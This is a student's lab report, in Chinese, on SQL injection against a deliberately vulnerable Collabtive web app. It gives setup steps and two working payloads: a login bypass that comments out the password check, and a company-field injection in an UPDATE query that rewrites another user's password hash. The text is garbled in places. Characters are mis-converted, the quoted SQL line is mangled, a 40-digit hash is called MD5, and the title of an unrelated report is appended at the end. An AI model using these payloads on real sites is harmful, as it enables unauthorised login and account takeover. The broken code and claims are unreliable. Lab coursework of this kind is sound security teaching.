20169219 SQL注入實驗報告

實驗介紹

SQL注入技術是利用web應用程序和數據庫服務器之間的接口來篡改網站內容的攻擊技術。經過把SQL命令插入到Web表單提交框、輸入域名框或頁面請求框中，最終欺騙服務器執行惡意的SQL命令。

在這個實驗中,咱們使用的web應用程序稱爲Collabtive。咱們禁用Collabtive的若干防禦措施，這樣咱們就建立了一個容易受到SQL注入攻擊的Collabtive版本。通過咱們的人工修改,咱們就能夠經過實驗分析許多web開發人員的常見錯誤與疏忽。在本實驗中學生的目標是找到方法來利用SQL注入漏洞實施攻擊，並經過掌握的技術來阻止此類攻擊的發生。

預備知識

一、 SQL語言

結構化查詢語言(Structured Query Language)簡稱SQL：是一種特殊目的的編程語言，是一種數據庫查詢和程序設計語言，用於存取數據以及查詢、更新和管理關係數據庫系統；同時也是數據庫腳本文件的擴展名。

常見SQL語句

二、SQL注入

SQL注入：SQL注入能使攻擊者繞過認證機制，徹底控制遠程服務器上的數據庫。SQL是結構化查詢語言的簡稱，它是訪問數據庫的事實標準。目前，大多數Web應用都使用SQL數據庫來存放應用程序的數據。幾乎全部的Web應用在後臺都使用某種SQL數據庫。跟大多數語言同樣，SQL語法容許數據庫命令和用戶數據混雜在一塊兒的。若是開發人員不細心的話，用戶數據就有可能被解釋成命令，這樣的話，遠程用戶就不只能向Web應用輸入數據，並且還能夠在數據庫上執行任意命令了。

sql注入原理講解

三、SQL注入危害

非法讀取、篡改、添加、刪除數據庫中的數據。
盜取用戶的各種敏感信息，獲取利益。
經過修改數據庫來修改網頁上的內容。
私自添加或刪除帳號。
注入木馬等等。

四、環境搭建

啓動mysql：

sudo mysqld_safe

注意啓動後程序不會退出，能夠打開新的終端執行後續命令。

啓動Apache：

sudo service apache2 start

    密碼：dees

配置DNS：

sudo vim /etc/hosts

配置網站文件：

sudo vim /etc/apache2/conf.d/lab.conf
    sudo service apache2 restart  重啓服務

關閉php配置策略：

sudo vim /etc/php5/apache2/php.ini

把magic_quotes_gpc=On 改成 magic_quotes_gpc = Off

2.PNG

關於magic_quotes_off函數：

對於magic_quotes_gpc=on的狀況， 咱們能夠不對輸入和輸出數據庫的字符串數據做addslashes()和stripslashes()的操做,數據也會正常顯示；

若是此時你對輸入的數據做了addslashes()處理，那麼在輸出的時候就必須使用stripslashes()去掉多餘的反斜槓。
對於PHP magic_quotes_gpc=off 的狀況

必須使用addslashes()對輸入數據進行處理，但並不須要使用stripslashes()格式化輸出，由於addslashes()並未將反斜槓一塊兒寫入數據庫，只是幫助mysql完成了sql語句的執行。

實驗內容

lab1 select語句的sql注入

訪問：www.sqllabcollabtive.com；當咱們知道用戶而不知道到密碼的時候，咱們能夠怎麼登錄？

查看登錄驗證文件：

sudo vim /var/www/SQL/Collabtive/include/class.user.php

找到其中第375行
\(sel1 = mysql_query ("SELECT ID, name, locale, lastlogin, gender, FROM user WHERE (name = '\)user' OR email = '\(user') AND pass = '\)pass'");
這一句就是咱們登陸時，後臺的sql語句；咱們能夠構造一個語句，在不知道密碼的狀況下登錄；

咱們在$user後面加上) # 這樣就會只驗證用戶名，後面的會被#註釋

lab2 update語句的sql注入

Collabtive平臺中能夠更新用戶信息，咱們要實現經過本身的用戶去修改別人的用戶信息；

訪問用戶編輯連接：http://www.sqllabcollabtive.com/manageuser.php?action=editform&id=1

在Collabtive web應用程序中，若是用戶想更新他們的我的資料，他們能夠去個人賬戶，單擊編輯連接，而後填寫表格以更新資料信息。在用戶發送更新請求到服務器，一個UPDATE SQL語句將建造在include/class.user.php。這句話的目的是修改用戶表中的當前用戶的配置信息。

有一個在這個SQL語句中的SQL注入漏洞；

sudo vim /var/www/SQL/Collabtive/include/class.user.php

咱們能夠找到以下的代碼

function edit($id, $name, $realname, $email, $tel1, $tel2, $company,
              $zip, $gender, $url, $address1, $address2, $state,
              $country, $tags, $locale, $avatar = "", $rate = 0.0)
    {
    $name = mysql_real_escape_string($name);
    $realname = mysql_real_escape_string($realname);

    //modified for SQL Lab
    //$company = mysql_real_escape_string($company);
    $email = mysql_real_escape_string($email);

    // further escaped parameters removed for brevity...

    $rate = (float) $rate;
    $id = (int) $id;

    if ($avatar != "")
        {
            $upd = mysql_query("UPDATE user SET name='$name', email='$email',
                                tel1='$tel1', tel2='$tel2', company='$company',
                                zip='$zip', gender='$gender', url='$url',
                                adress='$address1', adress2='$address2',
                                state='$state', country='$country',
                                tags='$tags', locale='$locale',
                                avatar='$avatar', rate='$rate' WHERE ID = $id");
        }
    else
        {
            // same query as above minus setting avatar; removed for
            // brevity
        }
    if ($upd)
        {
            $this->mylog->add($name, 'user', 2, 0);
            return true;
        }
    else
        {
            return false;
        }
    }

咱們會發現​sql語句爲：SELECT ID WHERE name=​'$user',而且company的位置是存在注入漏洞，原理同lab1。

這樣咱們就能夠越權來修改其餘用戶的信息及密碼；

在編輯用戶的位置：user 填 ted 用戶；

Company 處填：

', `pass` = '9d4e1e23bd5b727046a9e3b4b7db57bd8d6ee684' WHERE ID = 4 # '

注：這裏的 9d4e1e23bd5b727046a9e3b4b7db57bd8d6ee684 就是pass的md5值；

20169219 TCP_IP網絡協議攻擊實驗報告